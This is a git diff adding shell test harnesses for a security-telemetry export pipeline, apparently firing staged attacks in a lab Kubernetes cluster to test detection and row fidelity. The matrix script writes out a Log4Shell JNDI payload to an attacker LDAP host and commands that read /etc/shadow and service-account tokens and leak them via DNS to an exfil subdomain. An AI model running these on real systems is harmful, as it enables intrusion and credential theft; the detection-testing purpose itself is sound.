+# CONDITIONS = space-list of ATTACK:NOISE (ATTACK=log4shell|argocd|react2argo, NOISE=off|on)
+# For each condition: ALL arm (passthrough firehose) then DX arm (streaming), REPS each,
+# 2-min window, single fire at t=60s, truncate all CH + settle between reps, measure every
+# forensic_db table. Pre-flight AE guard + per-rep attack-fired (R0001) acceptance gate.
+# Skips conditions whose workload isn't deployed (logs SKIP) so it does what it can now.
+set -uo pipefail
+CONDS=${CONDITIONS:-"log4shell:off log4shell:on argocd:off argocd:on react2argo:off react2argo:on"}
+REPS=${REPS:-5}; RUNSEC=${RUNSEC:-120}; FIREAT=${FIREAT:-60}; GAP=${GAP:-180}
+NS=log4j-poc; CHPOD=chi-forensic-soc-db-soc-cluster-0-0-0
+OUT=/tmp/matrix.txt; RES=/tmp/matrix.tsv
+: > "$OUT"; : > "$RES"
+chq(){ kubectl -n clickhouse exec "$CHPOD" -c clickhouse -- clickhouse-client -q "$1" 2>/dev/null; }
+say(){ echo "[$(date -u +%H:%M:%S)] $*" | tee -a "$OUT"; }
+TABLES=$(chq "SELECT name FROM system.tables WHERE database='forensic_db' AND engine LIKE '%MergeTree%' FORMAT TSV")
+truncate_all(){ local t; for t in $TABLES; do chq "TRUNCATE TABLE IF EXISTS forensic_db.\`$t\`" >/dev/null 2>&1; done; }
+ensure_healthy(){ local p; p=$(kubectl -n pl get vizier -o jsonpath='{.items[*].status.vizierPhase}' 2>/dev/null)
+ if [ "$p" != Healthy ]; then kubectl -n pl delete pod -l name=vizier-query-broker >/dev/null 2>&1
+ for _ in $(seq 1 20); do [ "$(kubectl -n pl get vizier -o jsonpath='{.items[*].status.vizierPhase}' 2>/dev/null)" = Healthy ] && break; sleep 4; done; fi
+ kubectl -n pl get vizier -o jsonpath='{.items[*].status.vizierPhase}' 2>/dev/null; }
+ae_ok(){ local bad; bad=$(kubectl -n pl get pods -l name=adaptive-export --no-headers 2>/dev/null | awk '$3!="Running"{c++} END{print c+0}'); [ "${bad:-1}" -eq 0 ]; }
+
+# ---- noise (volproof loadgen) ----
+noise(){ if [ "$1" = on ]; then kubectl apply -f /tmp/loadgen.yaml >/dev/null 2>&1; kubectl -n $NS rollout status deploy/volproof-loadgen --timeout=120s >/dev/null 2>&1; say " noise ON (volproof-loadgen)";
+ else kubectl -n $NS delete deploy volproof-loadgen --ignore-not-found --wait=false >/dev/null 2>&1; say " noise OFF"; fi; }
+
+# ---- per-attack workload readiness + fire + R0001 gate ----
+ATTACK=""
+ready(){ case "$ATTACK" in
+ log4shell) kubectl -n $NS get pods --no-headers 2>/dev/null | grep -q '^backend' ;;
+ argocd) kubectl get ns argocd >/dev/null 2>&1 && kubectl -n argocd get application probe-app >/dev/null 2>&1 ;;
+ react2argo) kubectl get ns react >/dev/null 2>&1 || kubectl -n default get deploy react >/dev/null 2>&1 ;;
+ esac; }
+fire(){ case "$ATTACK" in
+ log4shell)
+ local BIP BPORT BP; BIP=$(kubectl -n $NS get svc backend -o jsonpath='{.spec.clusterIP}' 2>/dev/null); BPORT=$(kubectl -n $NS get svc backend -o jsonpath='{.spec.ports[0].port}' 2>/dev/null)
+ kubectl -n attacker-ns exec deploy/attacker -- curl -s -m5 -A '${jndi:ldap://attacker.attacker-ns.svc.cluster.local:1389/Payload}' "http://$BIP:$BPORT/api/products" >/dev/null 2>&1 || true
+ BP=$(kubectl -n $NS get pods --no-headers 2>/dev/null | awk '/^backend/{print $1;exit}')
+ [ -n "$BP" ] && kubectl -n $NS exec "$BP" -- sh -c 'whoami; id; cat /etc/shadow 2>/dev/null|head -2; cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null|head -c20; D=$(cat /etc/shadow 2>/dev/null|tr -dc "a-z0-9"|head -c90); i=0; while [ $i -lt 5 ]; do C=$(echo "$D"|cut -c$((i*18+1))-$((i*18+18))); getent hosts "x${C}.exfil.attacker.attacker-ns.svc.cluster.local" >/dev/null 2>&1; i=$((i+1)); done' >/dev/null 2>&1 || true ;;
+ argocd)
+ kubectl -n argocd annotate application probe-app argocd.argoproj.io/refresh=hard --overwrite >/dev/null 2>&1 || true; sleep 25
+ kubectl -n argocd annotate application probe-app argocd.argoproj.io/refresh=hard --overwrite >/dev/null 2>&1 || true ;;
+ react2argo)
+ # (1) react RCE -> steals SA token -> POSTs the malicious argocd Application
+ # `sys-housekeeping` (sealed trigger, applied verbatim).
+ kubectl delete job react2shell-trigger -n default --ignore-not-found >/dev/null 2>&1
+ kubectl apply -f /tmp/react2argo-trigger.yaml >/dev/null 2>&1 || true
+ # (2) cache-bust so the render-exec re-fires this rep. The payload is a
+ # render-exec: argocd-repo-server runs `kustomize build --enable-exec` ->
+ # ./mal.sh -> reads /etc/shadow (R0001 + R0010 on repo-server) at RENDER
+ # time. argocd caches rendered manifests in argocd-REDIS; a repo-server
+ # restart does NOT clear it (verified). Restart argocd-redis to flush the
+ # manifest cache, then one soft (cache-respecting) reconcile nudge so the
+ # render re-fires within the rep window. (RCA 2026-06-19.)
+ kubectl -n argocd rollout restart deploy/argocd-redis >/dev/null 2>&1
+ kubectl -n argocd rollout status deploy/argocd-redis --timeout=60s >/dev/null 2>&1
+ kubectl -n argocd annotate application sys-housekeeping argocd.argoproj.io/refresh=normal --overwrite >/dev/null 2>&1 || true ;;
+ esac; }
+# acceptance gate: R0001 (unexpected process) seen in the last ~110s (the fire window)
+r0001_recent(){ chq "SELECT count() FROM forensic_db.kubescape_logs WHERE RuleID='R0001' AND event_time >= toUInt64((now()-130))*1000000000"; }
+
+measure(){ local cond=$1 arm=$2 rep=$3 valid=$4
+ printf " %-16s %10s %12s\n" table rows bytes | tee -a "$OUT"
+ while IFS=$'\t' read -r t r b; do [ -z "$t" ] && continue
+ printf " %-16s %10d %12d\n" "$t" "${r:-0}" "${b:-0}" | tee -a "$OUT"
+ printf "%s\t%s\t%s\t%s\t%s\t%s\n" "$cond" "$arm" "$rep" "$t" "${r:-0}" "${b:-0}" >> "$RES"
+ done < <(chq "SELECT table, sum(rows), sum(data_compressed_bytes) FROM system.parts WHERE database='forensic_db' AND active GROUP BY table ORDER BY table FORMAT TSV")
+ say " valid=$valid steered=$(chq "SELECT arrayStringConcat(groupArray(pod),',') FROM (SELECT DISTINCT pod FROM forensic_db.adaptive_attribution WHERE t_end>now())")"; }
+
+run_arm(){ local cond=$1 arm=$2; shift 2
+ say "--- $cond ARM $arm : $* ---"
+ kubectl -n pl set env ds/adaptive-export "$@" >/dev/null 2>&1
+ kubectl -n pl rollout status ds/adaptive-export --timeout=150s >/dev/null 2>&1
+ # Wait for AE to actually be Running — `rollout status` can return during the
+ # restart race; retry before aborting so we don't false-abort a healthy roll.
+ local _i; for _i in 1 2 3 4 5 6 7 8 9; do ae_ok && break; sleep 10; done
+ if ! ae_ok; then say " ABORT-arm: AE not Running after rollout+90s wait:"; kubectl -n pl get pods -l name=adaptive-export --no-headers 2>/dev/null|awk '{print " "$1,$3,$4}'|tee -a "$OUT"; return 1; fi
+ say " AE OK; vizier=$(ensure_healthy)"
+ local rep t0 g
+ for rep in $(seq 1 "$REPS"); do
+ say " $cond $arm rep$rep"; truncate_all; ensure_healthy >/dev/null
+ t0=$(date +%s); while [ $(( $(date +%s) - t0 )) -lt "$FIREAT" ]; do sleep 2; done
+ say " FIRE $ATTACK"; fire
+ while [ $(( $(date +%s) - t0 )) -lt "$RUNSEC" ]; do sleep 2; done; sleep 15
+ g=$(r0001_recent); g=${g:-0}; [ "$g" -gt 0 ] && valid=yes || valid="NO(r0001=0)"
+ measure "$cond" "$arm" "$rep" "$valid"
+ if [ "$rep" -lt "$REPS" ]; then say " settle ${GAP}s"; sleep "$GAP"; fi
+ done; return 0; }
+
+say "===== MATRIX START conds=[$CONDS] REPS=$REPS ====="
+for c in $CONDS; do
+ ATTACK=${c%%:*}; NZ=${c##*:}
+ say "===== CONDITION $ATTACK noise=$NZ ====="
+ if ! ready; then say " SKIP — $ATTACK workload not deployed"; continue; fi
+ noise "$NZ"; sleep 20
+ run_arm "$ATTACK/$NZ" ALL ADAPTIVE_PASSTHROUGH=true ADAPTIVE_WRITE_MODE= ADAPTIVE_PUSH_PIXIE_ROWS=false ADAPTIVE_PASSTHROUGH_WINDOW_SEC=60 ADAPTIVE_PASSTHROUGH_REFRESH_SEC=60 || continue
+ say " inter-arm settle ${GAP}s"; sleep "$GAP"
+ run_arm "$ATTACK/$NZ" DX ADAPTIVE_PASSTHROUGH=false ADAPTIVE_WRITE_MODE=streaming ADAPTIVE_PUSH_PIXIE_ROWS=false ADAPTIVE_STREAM_WINDOW_SEC=60 ADAPTIVE_STREAM_REFRESH_SEC=60 || continue
+ noise off
+ say " inter-condition settle ${GAP}s"; sleep "$GAP"
+done
+
+say "===== SUMMARY (mean rows over valid reps, per condition/arm) ====="
+for c in $CONDS; do for arm in ALL DX; do for t in http_events dns_events conn_stats pgsql_events; do
+ m=$(awk -F'\t' -v C="${c%%:*}/${c##*:}" -v A=$arm -v T=$t '$1==C&&$2==A&&$4==T{s+=$5;n++} END{if(n)printf "%.0f",s/n; else print 0}' "$RES")
+ [ "$m" != 0 ] && say " $c $arm $t mean_rows=$m"
+done; done; done
+say "===== MATRIX DONE ====="
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/exp_row_reconcile.sh b/src/e2e_test/adaptive_export_loadtest/harness/exp_row_reconcile.sh
new file mode 100755
index 00000000000..a755d783b72
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_row_reconcile.sh
@@ -0,0 +1,127 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# exp_row_reconcile.sh — DETERMINISTIC row-level PEM↔CH reconciliation for AE.
+#
+# WHY: count(CH) >= count(PEM) ("write ⊇ read") is NOT proof — CH can be inflated by
+# re-pull dups (C8) while silently MISSING specific rows PEM has. This test proves
+# identity at ROW granularity: every individual row Pixie captured (PEM) was written
+# to forensic_db (CH) with matching values — no loss, no fabrication.
+#
+# HOW: Pixie protocol rows have no native UUID, so we MINT one. Each request carries a
+# unique probe id - in its URL → that string is the row's deterministic UUID,
+# visible in http_events.req_path on BOTH sides. We then compare the SET of (uuid|method|
+# status) fingerprints from PEM vs CH. This cleanly separates two layers:
+# expected (0..N-1) --Pixie capture--> PEM set --AE fidelity--> CH set
+# - expected \ PEM = Pixie/eBPF didn't capture it (Pixie property, NOT AE)
+# - PEM \ CH = AE LOST a row Pixie had (← the AE bug we hunt; must be empty)
+# - CH \ PEM = AE FABRICATED a row Pixie lacked (must be empty; dups are same uuid, not new)
+# - mismatched fingerprint for same uuid = value corruption (shows as both loss+fab)
+#
+# PASS ⇔ (PEM \ CH) empty AND (CH \ PEM) empty. Runs NODE-SIDE (kubectl + px local).
+set -uo pipefail
+N=${N:-300}; NS=${NS:-log4j-poc}; SVC=${SVC:-frontend}
+CLUSTER=${CLUSTER:-547d0a15-4004-435e-aea1-c13e596eb976}
+CHPOD=${CHPOD:-chi-forensic-soc-db-soc-cluster-0-0-0}
+SETTLE=${SETTLE:-180} # > two passthrough sweeps (~80s each) + write
+O=/tmp/rowrec; mkdir -p "$O"
+chq(){ kubectl -n clickhouse exec "$CHPOD" -c clickhouse -- clickhouse-client -q "$1" 2>/dev/null; }
+# pxrun relies on the persisted `px auth login` session (auth.json); PX_CLOUD_ADDR is non-secret.
+pxrun(){ PX_CLOUD_ADDR="$(grep -E '^PX_CLOUD_ADDR=' /tmp/pixie-keys.env 2>/dev/null | cut -d= -f2-)"; export PX_CLOUD_ADDR
+ px run -f "$1" -c "$CLUSTER" 2>&1 | grep -ivE "PX_|ENV VARS|^\*|Pixie CLI|Cloud|^$|resump"; }
+
+FE=$(kubectl -n "$NS" get svc "$SVC" -o jsonpath='{.spec.clusterIP}')
+FEPOD_NSP="$NS/$(kubectl -n "$NS" get pods -l app="$SVC" -o jsonpath='{.items[0].metadata.name}' 2>/dev/null)"
+[ "$FEPOD_NSP" = "$NS/" ] && FEPOD_NSP="$NS/$(kubectl -n "$NS" get pods --no-headers 2>/dev/null | awk '/^'"$SVC"'/{print $1; exit}')"
+TAG="rr$(date +%s)" # unique run tag → isolates THIS run's rows (clock-skew-proof)
+echo "TAG=$TAG N=$N target=$FEPOD_NSP fe=$FE" | tee "$O/meta.txt"
+
+# 0. Put AE in passthrough so it captures the frontend (write-fidelity test, not gating).
+kubectl -n pl set env ds/adaptive-export ADAPTIVE_PASSTHROUGH=true ADAPTIVE_PASSTHROUGH_WINDOW_SEC=240 ADAPTIVE_PASSTHROUGH_REFRESH_SEC=20 ADAPTIVE_PUSH_PIXIE_ROWS=false >/dev/null 2>&1
+kubectl -n pl rollout status ds/adaptive-export --timeout=140s >/dev/null 2>&1
+sleep 40 # AE reconnect warm
+
+# 1. Fire N uniquely-tagged requests from a gen pod (gen client may be untraced; we read
+# the TRACED frontend SERVER-side, so every request shows up as one http_events row).
+kubectl -n "$NS" delete pod rowgen --ignore-not-found --wait=true >/dev/null 2>&1
+kubectl -n "$NS" run rowgen --image=busybox:1.36 --restart=Never --command -- \
+ sh -c "for i in \$(seq 0 $((N-1))); do wget -qO- 'http://$FE/api/products?probe=$TAG-'\$i >/dev/null 2>&1; done; echo ROWGEN_DONE; sleep 3600"
+for _ in $(seq 1 90); do kubectl -n "$NS" logs rowgen 2>/dev/null | grep -q ROWGEN_DONE && break; sleep 2; done
+echo "fired $N requests; settling ${SETTLE}s for AE to sweep+write" | tee -a "$O/meta.txt"
+sleep "$SETTLE"
+
+# 2. PEM fingerprints: (uuid|method|status) Pixie captured for the frontend, filtered by TAG.
+cat > "$O/pem.pxl" < "$O/pem.raw"
+# Build fingerprint uuid|method|status; req_path carries the uuid, no spaces in any field.
+awk -v tag="$TAG" '
+ { for(i=1;i<=NF;i++){ if($i ~ tag"-[0-9]+"){ uuid=$i; sub(/^.*(/tag"-[0-9]+/).*/,"",uuid) } } }' /dev/null 2>/dev/null
+grep -oE "$TAG-[0-9]+" "$O/pem.raw" | sort -u > "$O/pem.uuids"
+# fingerprint with method+status (parse columns around the probe token)
+python3 - "$O/pem.raw" "$TAG" > "$O/pem.fp" <<'PY'
+import sys,re
+tag=sys.argv[2]
+seen=set()
+for ln in open(sys.argv[1]):
+ m=re.search(re.escape(tag)+r"-(\d+)",ln)
+ if not m: continue
+ meth=("GET" if " GET " in " "+ln+" " or "GET" in ln else "?")
+ st=re.search(r"\b([1-5]\d\d)\b",ln); st=st.group(1) if st else "?"
+ seen.add(f"{tag}-{m.group(1)}|{meth}|{st}")
+print("\n".join(sorted(seen)))
+PY
+
+# 3. CH fingerprints: what AE actually wrote (distinct, dedup'd) for the same TAG.
+chq "SELECT DISTINCT concat(extract(req_path,'($TAG-[0-9]+)'),'|',req_method,'|',toString(resp_status))
+ FROM forensic_db.http_events
+ WHERE pod='$FEPOD_NSP' AND req_path LIKE '%$TAG-%'
+ ORDER BY 1 FORMAT TSV" 2>/dev/null | grep -E "$TAG-[0-9]+\|" | sort -u > "$O/ch.fp"
+grep -oE "$TAG-[0-9]+" "$O/ch.fp" | sort -u > "$O/ch.uuids"
+CH_TOTAL=$(chq "SELECT count() FROM forensic_db.http_events WHERE pod='$FEPOD_NSP' AND req_path LIKE '%$TAG-%'")
+
+# 4. Reconcile.
+seq 0 $((N-1)) | sed "s/^/$TAG-/" | sort -u > "$O/expected.uuids"
+LOSS=$(comm -23 "$O/pem.fp" "$O/ch.fp" | wc -l) # in PEM not CH = AE LOST (must be 0)
+FAB=$(comm -13 "$O/pem.fp" "$O/ch.fp" | wc -l) # in CH not PEM = AE FABRICATED/value-mismatch (must be 0)
+MATCH=$(comm -12 "$O/pem.fp" "$O/ch.fp" | wc -l)
+PIXIE_MISS=$(comm -23 "$O/expected.uuids" "$O/pem.uuids" | wc -l) # Pixie didn't capture (NOT AE)
+PEM_U=$(wc -l < "$O/pem.uuids"); CH_U=$(wc -l < "$O/ch.uuids")
+DUP="n/a"; [ "$CH_U" -gt 0 ] && DUP=$(awk "BEGIN{printf \"%.2f\", $CH_TOTAL/$CH_U}")
+
+{
+echo "================ ROW-LEVEL RECONCILE (TAG=$TAG, N=$N) ================"
+echo "Pixie captured (PEM distinct uuids): $PEM_U / $N (expected\\PEM = $PIXIE_MISS not captured by eBPF)"
+echo "AE wrote (CH distinct uuids): $CH_U (CH total rows=$CH_TOTAL → dup factor ${DUP}x)"
+echo "fingerprint matched (uuid|method|status): $MATCH"
+echo "AE LOSS (PEM\\CH, MUST be 0): $LOSS"
+echo "AE FAB (CH\\PEM, MUST be 0): $FAB"
+[ "$LOSS" -gt 0 ] && { echo '--- LOST rows (Pixie had, AE did NOT write): ---'; comm -23 "$O/pem.fp" "$O/ch.fp" | head -20; }
+[ "$FAB" -gt 0 ] && { echo '--- FABRICATED/mismatched rows (in CH, not in PEM): ---'; comm -13 "$O/pem.fp" "$O/ch.fp" | head -20; }
+if [ "$LOSS" -eq 0 ] && [ "$FAB" -eq 0 ] && [ "$PEM_U" -gt 0 ]; then
+ echo "VERDICT: PASS — every row Pixie captured was written to CH with matching values."
+else
+ echo "VERDICT: FAIL — AE write-set != Pixie read-set at row granularity."
+fi
+} | tee "$O/RESULT.txt"
+kubectl -n "$NS" delete pod rowgen --ignore-not-found --wait=false >/dev/null 2>&1
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/inject.sh b/src/e2e_test/adaptive_export_loadtest/harness/inject.sh
new file mode 100755
index 00000000000..df6de5219c1
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/inject.sh
@@ -0,0 +1,109 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# inject.sh — inject controlled kubescape_logs trigger rows into ClickHouse over
+# the HTTP interface, with EXACT control over event_time. This is the only AE
+# input under test: real kubescape is NOT deployed for these load-tests.
+#
+# Row shape mirrors exactly what Vector emits (and what AE's trigger polls):
+# BaseRuntimeMetadata, CloudMetadata, RuleID, RuntimeK8sDetails (JSON string
+# with podName/podNamespace), RuntimeProcessDetails (JSON string with
+# processTree.pid/comm), event, event_time (UInt64 unix-NANOS), hostname.
+#
+# anomaly_hash = SHA256(pid, comm, pod, namespace)[:16] is computed by AE — NOT
+# set here — so per-rep uniqueness comes from a unique --pod (data plane) and a
+# unique --hostname (control plane; trigger_watermark is partitioned by host).
+#
+# Timestamp discipline (PRODUCTION UNIT = SECONDS):
+# event_time is unix SECONDS — the unit the soc Vector kubescape sink emits
+# (`to_unix_timestamp(ts)`, VRL default seconds) and what the CH DDL's
+# `toDateTime(event_time)` TTL/PARTITION assume. (The AE trigger auto-detects
+# s/ms/ns, but the DDL only handles seconds — so fixtures MUST be seconds or
+# the rows are TTL-deleted; see FINDINGS_AND_BACKLOG.md F1/AE-2.)
+# --event-time is the FIRST row's event_time (unix SECONDS). With --count N>1
+# the rows get event_time, event_time+dt, ... (--dt-s, default 1s) so they are
+# DISTINCT + monotone and never collide at the watermark boundary — UNLESS
+# --same-time is given, which deliberately reuses one event_time to exercise
+# the boundary-fingerprint dedup (experiment E4).
+set -euo pipefail
+
+ENDPOINT="${CH_ENDPOINT:-http://localhost:8123}"
+CH_USER="${CH_USER:-}"
+CH_PASS="${CH_PASS:-}"
+NS="" ; POD="" ; RULE="R0001" ; PID="1234" ; COMM="java"
+EVENT_TIME="" ; HOSTNAME_="" ; COUNT=1 ; DT_S=1 ; SAME_TIME=0
+ALERT=""
+
+usage(){ grep '^#' "$0" | sed 's/^# \{0,1\}//' ; exit "${1:-0}"; }
+
+while [[ $# -gt 0 ]]; do
+ case "$1" in
+ --endpoint) ENDPOINT="$2"; shift 2;;
+ --user) CH_USER="$2"; shift 2;;
+ --pass) CH_PASS="$2"; shift 2;;
+ --ns) NS="$2"; shift 2;;
+ --pod) POD="$2"; shift 2;;
+ --rule) RULE="$2"; shift 2;;
+ --pid) PID="$2"; shift 2;;
+ --comm) COMM="$2"; shift 2;;
+ --event-time) EVENT_TIME="$2"; shift 2;;
+ --hostname) HOSTNAME_="$2"; shift 2;;
+ --count) COUNT="$2"; shift 2;;
+ --dt-s) DT_S="$2"; shift 2;;
+ --same-time) SAME_TIME=1; shift;;
+ --alert) ALERT="$2"; shift 2;;
+ -h|--help) usage 0;;
+ *) echo "inject.sh: unknown arg $1" >&2; usage 1;;
+ esac
+done
+
+[[ -n "$NS" && -n "$POD" && -n "$EVENT_TIME" && -n "$HOSTNAME_" ]] || {
+ echo "inject.sh: --ns --pod --event-time --hostname are required" >&2; exit 2; }
+[[ -n "$ALERT" ]] || ALERT="$RULE"
+
+# Build the JSONEachRow body. RuntimeK8sDetails / RuntimeProcessDetails are
+# JSON-STRING columns, so their inner quotes are escaped (\"). event_time is
+# unix SECONDS; --count rows step by DT_S seconds (distinct, monotone).
+body=""
+for ((i=0; i&2
+ cat /tmp/inject_resp.$$ >&2 || true
+ rm -f /tmp/inject_resp.$$
+ exit 1
+fi
+rm -f /tmp/inject_resp.$$
+echo "inject.sh: OK count=${COUNT} ns=${NS} pod=${POD} rule=${RULE} host=${HOSTNAME_} t0=${EVENT_TIME} same_time=${SAME_TIME}"
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/lib.sh b/src/e2e_test/adaptive_export_loadtest/harness/lib.sh
new file mode 100755
index 00000000000..680b694975a
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/lib.sh
@@ -0,0 +1,216 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# lib.sh — shared helpers for the AE fixture-isolation load-tests (L3, live rig).
+#
+# Connectivity model (per the labctl-session-discipline rule): all kubectl runs
+# LOCALLY over the tailscale-direct kubeconfig (make kubeconfig), and ClickHouse
+# is reached over a local port-forward — NO long-held labctl ssh sessions.
+#
+# Required env (export before sourcing or pass through):
+# KUBECONFIG tailscale-direct kubeconfig for the rig (make kubeconfig)
+# AELOAD_IMAGE ttl.sh/aeload-:24h (built on the PG dev-machine)
+# Optional:
+# CH_NS (default clickhouse), AE_NS (default pl), AELOAD_NS (default aeload)
+# CH_HTTP (default http://127.0.0.1:8123 via the port-forward this lib opens)
+# CH_RO_USER / CH_RO_PASS (SELECT creds; default = empty → default user)
+# CH_RW_USER / CH_RW_PASS (INSERT creds; default ingest_writer/changeme-ingest)
+set -uo pipefail
+
+CH_NS="${CH_NS:-clickhouse}"
+AE_NS="${AE_NS:-pl}"
+AELOAD_NS="${AELOAD_NS:-aeload}"
+CH_HTTP="${CH_HTTP:-http://127.0.0.1:8123}"
+CH_RO_USER="${CH_RO_USER:-}"
+CH_RO_PASS="${CH_RO_PASS:-}"
+CH_RW_USER="${CH_RW_USER:-ingest_writer}"
+CH_RW_PASS="${CH_RW_PASS:-changeme-ingest}"
+HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+K8S_DIR="$(cd "$HERE/../k8s" && pwd)"
+
+_PF_PID=""
+
+die(){ echo "[aeload] FATAL: $*" >&2; exit 1; }
+log(){ echo "[aeload] $*" >&2; }
+
+# k — kubectl over the tailscale kubeconfig.
+k(){ kubectl "$@"; }
+
+# ch_svc — resolve the ClickHouse service name (first svc exposing 8123).
+ch_svc(){
+ k -n "$CH_NS" get svc -o jsonpath='{range .items[*]}{.metadata.name}{" "}{.spec.ports[*].port}{"\n"}{end}' \
+ | awk '/8123/{print $1; exit}'
+}
+
+# ch_portforward_up — start a background port-forward 8123 -> CH HTTP.
+# Set CH_NO_PF=1 when running LAB-SIDE (on the PG dev-machine): there kubectl is
+# native and ClickHouse is reachable in-cluster, so point CH_HTTP straight at the
+# service (e.g. http://..svc:8123) and skip the forward entirely. This
+# is the disciplined path — no long-held labctl ssh / no tailnet dependency.
+ch_portforward_up(){
+ if [[ "${CH_NO_PF:-0}" == "1" ]]; then
+ # Auto-fill CH_HTTP from the in-cluster service if left at the default.
+ if [[ "$CH_HTTP" == "http://127.0.0.1:8123" ]]; then
+ local svc; svc="$(ch_svc)"; [[ -n "$svc" ]] || die "no ClickHouse svc exposing 8123 in ns $CH_NS"
+ CH_HTTP="http://${svc}.${CH_NS}.svc:8123"
+ fi
+ log "lab-side mode: CH_HTTP=$CH_HTTP (no port-forward)"
+ curl -fsS "$CH_HTTP/ping" >/dev/null 2>&1 || die "CH not reachable at $CH_HTTP"
+ return 0
+ fi
+ local svc; svc="$(ch_svc)"; [[ -n "$svc" ]] || die "no ClickHouse svc exposing 8123 in ns $CH_NS"
+ log "port-forward svc/$svc 8123 (ns $CH_NS)"
+ k -n "$CH_NS" port-forward "svc/$svc" 8123:8123 >/tmp/aeload-pf.log 2>&1 &
+ _PF_PID=$!
+ for _ in $(seq 1 30); do
+ curl -fsS "$CH_HTTP/ping" >/dev/null 2>&1 && { log "port-forward ready"; return 0; }
+ sleep 0.5
+ done
+ die "port-forward to CH did not become ready (see /tmp/aeload-pf.log)"
+}
+ch_portforward_down(){ [[ -n "$_PF_PID" ]] && kill "$_PF_PID" 2>/dev/null || true; }
+trap ch_portforward_down EXIT
+
+# chq — run a read query, return the raw result (default user / RO creds).
+chq(){
+ local sql="$1" auth=()
+ [[ -n "$CH_RO_USER" ]] && auth=(-u "${CH_RO_USER}:${CH_RO_PASS}")
+ curl -sS "${auth[@]}" --data-binary "$sql" "$CH_HTTP/" 2>/dev/null
+}
+
+# count_pod — rows for this rep's pod (globally-unique pod
+# name → safe LIKE). Returns an integer (0 if table/rows absent).
+count_pod(){
+ local table="$1" uniq="$2"
+ local n; n="$(chq "SELECT count() FROM forensic_db.${table} WHERE pod LIKE '%${uniq}%'" )"
+ echo "${n:-0}" | tr -dc '0-9' | head -c 18
+}
+
+# NOTE: the live AE DaemonSet polls kubescape_logs WHERE hostname=,
+# so every injected fixture's hostname MUST be a real node. Per-rep isolation is
+# therefore by UNIQUE POD (distinct anomaly_hash), not by hostname. The helpers
+# below scope to (hostname=node, pod LIKE the rep's unique pod). adaptive_
+# attribution stores the BARE pod name (kubescape podName), unlike the protocol
+# tables whose pod is "/" (upid_to_pod_name).
+
+# attrib_count — adaptive_attribution rows (FINAL) for a rep.
+attrib_count(){
+ local node="$1" pod="$2" n
+ n="$(chq "SELECT count() FROM (SELECT 1 FROM forensic_db.adaptive_attribution FINAL WHERE hostname='${node}' AND pod LIKE '%${pod}%')")"
+ echo "${n:-0}" | tr -dc '0-9' | head -c 18
+}
+uniq_hashes(){
+ local node="$1" pod="$2" n
+ n="$(chq "SELECT uniqExact(anomaly_hash) FROM forensic_db.adaptive_attribution WHERE hostname='${node}' AND pod LIKE '%${pod}%'")"
+ echo "${n:-0}" | tr -dc '0-9' | head -c 18
+}
+# watermark_of — current trigger watermark for that node (monotone across
+# reps that share a node; equals the most-recently-injected event_time).
+watermark_of(){
+ local node="$1" n
+ n="$(chq "SELECT watermark FROM forensic_db.trigger_watermark FINAL WHERE hostname='${node}' AND table_name='kubescape_logs'")"
+ echo "${n:-0}" | tr -dc '0-9' | head -c 20
+}
+
+# attr_field — read one adaptive_attribution FINAL
+# column (e.g. n_anomalies, toUnixTimestamp(last_seen)) for a single pod.
+attr_field(){
+ local node="$1" pod="$2" field="$3" n
+ n="$(chq "SELECT ${field} FROM forensic_db.adaptive_attribution FINAL WHERE hostname='${node}' AND pod='${pod}'")"
+ echo "${n:-0}" | tr -dc '0-9' | head -c 20
+}
+
+# first_node — a real schedulable node name (fixture hostname for control-plane
+# experiments). nodes_list — all node names, newline-separated.
+nodes_list(){ k get nodes -o jsonpath='{range .items[*]}{.metadata.name}{"\n"}{end}'; }
+first_node(){ nodes_list | head -n1; }
+
+# now_ns — wall-clock unix nanoseconds (unique-name suffix only).
+now_ns(){ date +%s%N; }
+# now_s — wall-clock unix SECONDS = the production event_time unit (soc Vector
+# emits seconds; the CH DDL TTL/PARTITION assume seconds). ALL fixtures use this.
+now_s(){ date +%s; }
+
+# warmup — absorb the AE trigger cold-start on a node. The very first
+# poll after AE boots only establishes the watermark baseline, so the first
+# real event for a fresh hostname can be missed; a throwaway injection +
+# settle primes the per-node trigger so measured reps are steady-state.
+warmup(){
+ local node="$1" inject="$HERE/inject.sh"
+ log "warmup trigger on node=$node"
+ "$inject" --endpoint "$CH_HTTP" --user "$CH_RW_USER" --pass "$CH_RW_PASS" \
+ --hostname "$node" --ns aeload --pod "warmup-$(now_ns)" --rule R0001 \
+ --pid 999 --comm warmup --event-time "$(now_s)" >&2 || true
